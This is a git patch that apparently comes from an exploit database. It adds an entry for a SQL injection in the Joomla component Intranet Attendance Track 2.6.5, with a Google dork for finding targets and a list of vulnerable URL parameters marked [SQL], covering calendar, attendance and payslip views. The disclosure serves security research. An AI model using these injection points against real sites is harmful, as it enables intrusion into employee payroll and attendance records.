From 5d75646fa801b2a01e48320a71983f256b9b1273 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 26 Feb 2017 05:01:19 +0000 Subject: [PATCH] DB: 2017-02-26 1 new exploits Joomla! Component Intranet Attendance Track 2.6.5 - SQL Injection --- files.csv | 1 + platforms/php/webapps/41456.txt | 27 +++++++++++++++++++++++++++ 2 files changed, 28 insertions(+) create mode 100755 platforms/php/webapps/41456.txt diff --git a/files.csv b/files.csv index 0dd7fd79a..ce6ff05ee 100644 --- a/files.csv +++ b/files.csv @@ -37372,3 +37372,4 @@ id,file,description,date,author,platform,type,port 41452,platforms/php/webapps/41452.txt,"Joomla! Component Community Quiz 4.3.5 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps,0 41453,platforms/multiple/webapps/41453.html,"Apple WebKit 10.0.2 - 'Frame::setDocument' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",multiple,webapps,0 41455,platforms/php/webapps/41455.txt,"memcache-viewer - Cross-Site Scripting",2017-02-24,HaHwul,php,webapps,0 +41456,platforms/php/webapps/41456.txt,"Joomla! Component Intranet Attendance Track 2.6.5 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0 diff --git a/platforms/php/webapps/41456.txt b/platforms/php/webapps/41456.txt new file mode 100755 index 000000000..7625db244 --- /dev/null +++ b/platforms/php/webapps/41456.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Joomla! Component Intranet Attendance Track v2.6.5 - SQL Injection +# Google Dork: inurl:index.php?option=com_intranet +# Date: 25.02.2017 +# Vendor Homepage: http://thagatpam.in/ +# Software Buy: https://extensions.joomla.org/extensions/extension/clients-a-communities/communities/intranet-attendance-track/ +# Demo: http://demo4.thagatpam.in/ +# Version: 2.6.5 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# Login as regular user +# http://localhost/[PATH]/index.php?option=com_intranet&view=calendar&month=3&year=[SQL] +# http://localhost/[PATH]/index.php?option=com_intranet&view=calendar&month=[SQL] +# http://localhost/[PATH]/index.php?option=com_intranet&view=weeklyattendance&layout=weeklypdf&userid=940&weekstartdate=2017-02-20&weekuptodate=[SQL] +# http://localhost/[PATH]/index.php?option=com_intranet&view=weeklyattendance&layout=weeklypdf&userid=940&weekstartdate=[SQL] +# http://localhost/[PATH]/index.php?option=com_intranet&view=payslip&layout=mypayslip&user=940&month=8&year=[SQL] +# http://localhost/[PATH]/index.php?option=com_intranet&view=payslip&layout=mypayslip&user=940&month=[SQL] +# http://localhost/[PATH]/index.php?option=com_intranet&controller=promociones&task=landing&idPromocion=[SQL] +# http://localhost/[PATH]/index.php?option=com_intranet&controller=reservas&task=paso1&tipoIdaVuelta=1&rutaSalida=20&rutaDestino=[SQL] +# http://localhost/[PATH]/index.php?option=com_intranet&controller=reservas&task=paso1&tipoIdaVuelta=1&rutaSalida=[SQL] +# Etc.. +# # # # #